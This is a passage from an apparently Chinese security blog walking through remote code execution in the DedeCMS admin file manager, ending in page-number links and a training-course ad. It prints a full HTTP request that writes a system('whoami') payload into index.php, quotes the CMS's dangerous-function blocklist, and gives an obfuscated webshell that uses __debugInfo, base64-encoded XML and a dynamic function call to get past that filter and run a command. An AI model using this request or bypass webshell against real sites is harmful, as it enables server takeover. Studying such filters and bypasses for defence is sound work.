一样的方法
文件名是 filename,内容是 str
我们访问对应的路由
发现是一个文件管理器,而且可以编辑文件,那不是随便 getshell 了吗
POST /dede/file_manage_control.php HTTP/1.1
Host: dedecms:5135
Content-Length: 130
Cache-Control: max-age=0
Origin: http://dedecms:5135
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://dedecms:5135/dede/file_manage_view.php?fmdo=edit&filename=index.php&activepath=
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: menuitems=1_1%2C2_1%2C3_1; XDEBUG_SESSION=PHPSTORM; isg=BC0t-H7JNkY1K9KqstDirHGTPMmnimFclPBmVm8zhEQz5k2YN9gMLle10DoA_XkU; tfstk=gsmxOxa7tQAceJrHmnTljVp-sV9kxcH2mjkCj5b_cbettXgmmxVDPgwgQZNblAM1BArb7qVgi5EtQXpktHxn3xra5BAHx21QgMEa1hq6ruMWmMYktHxnhxrafBAnm2uO4We_ftsb5LE7K7wfcfNbP_wLLlNs1fZ7FRwa
Connection: keep-alive
fmdo=edit&backurl=&token=&activepath=&filename=index.php&str=%3C%3Fphp%0D%0Asystem%28%27whoami%27%29%3B&B1=++%E4%BF%9D+%E5%AD%98++
但是发现
所以准备调试分析一手
$str = preg_replace("#(/\*)[\s\S]*(\*/)#i", '', $str);
global $cfg_disable_funs;
$cfg_disable_funs = isset($cfg_disable_funs) ? $cfg_disable_funs : 'phpinfo,eval,assert,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,file_put_contents,fsockopen,fopen,fwrite,preg_replace';
$cfg_disable_funs = $cfg_disable_funs.',[$]GLOBALS,[$]_GET,[$]_POST,[$]_REQUEST,[$]_FILES,[$]_COOKIE,[$]_SERVER,include,require,create_function,array_map,call_user_func,call_user_func_array,array_filert,getallheaders';
foreach (explode(",", $cfg_disable_funs) as $value) {
$value = str_replace(" ", "", $value);
if(!empty($value) && preg_match("#[^a-z]+['\"]*{$value}['\"]*[\s]*[([{']#i", " {$str}") == TRUE) {
$str = dede_htmlspecialchars($str);
die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$str}</pre>");
}
}
if(preg_match("#^[\s\S]+<\?(php|=)?[\s]+#i", " {$str}") == TRUE) {
if(preg_match("#[$][_0-9a-z]+[\s]*[(][\s\S]*[)][\s]*[;]#iU", " {$str}") == TRUE) {
$str = dede_htmlspecialchars($str);
die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$str}</pre>");
}
if(preg_match("#[@][$][_0-9a-z]+[\s]*[(][\s\S]*[)]#iU", " {$str}") == TRUE) {
$str = dede_htmlspecialchars($str);
die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$str}</pre>");
}
if(preg_match("#[`][\s\S]*[`]#i", " {$str}") == TRUE) {
$str = dede_htmlspecialchars($str);
die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$str}</pre>");
}
}
发现原因是因为有 waf
直接交给一个聪明朋友
移除多行注释
$str = preg_replace("#(/\*)[\s\S]*(\*/)#i", '', $str);
防止攻击者把危险代码写在注释中来绕过检测。
危险函数与变量过滤
$cfg_disable_funs = 'eval,assert,exec,...,$_GET,$_POST,...';
匹配并拦截使用了以下内容的代码:
系统函数:eval, exec, system, passthru, popen, assert, shell_exec 等
全局变量:`$GET, $POST, $REQUEST, $COOKIE, $_FILES, GLOBALS
动态函数调用:call_user_func, create_function, 等
一旦匹配:直接终止执行并提示危险代码。
PHP 标签与代码执行行为检测
感觉过滤还是挺严格的
绕过 waf 到 RCE
直接掏出上次的 webshell,稍微修改一下就 ok 了
<?php
class User {
private $username;
private $password;
public function __construct($username, $password) {
$this->username = $username;
$this->password = $password;
}
public function __debugInfo() {
$xmlData = base64_decode("PGJvb2tzPgogICAgPHN5c3RlbT5jYWxjPC9zeXN0ZW0+CjwvYm9va3M+");
$xmlElement = new SimpleXMLElement($xmlData);
$namespaces = $xmlElement->getNamespaces(TRUE);
$xmlElement->rewind();
var_dump($xmlElement->key());
$result = $xmlElement->xpath('/books/system');
var_dump (($result[0]->__toString()));
($xmlElement->key())($result[0]->__toString());
return [
'username' => $this->username,
'info' => '这是调试时返回的信息',
'timestamp' => time()
];
}
}
$user = new User('alice', 'secret123');
var_dump($user);
原理上次大概讲过了,就是自动触发
详情可以看到蚁景网络安全这个公众号
https://mp.weixin.qq.com/s/WDWBwPQuXroBRpBPxkHOcg感谢给的平台
然后我们访问首页
成功弹出计算器
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

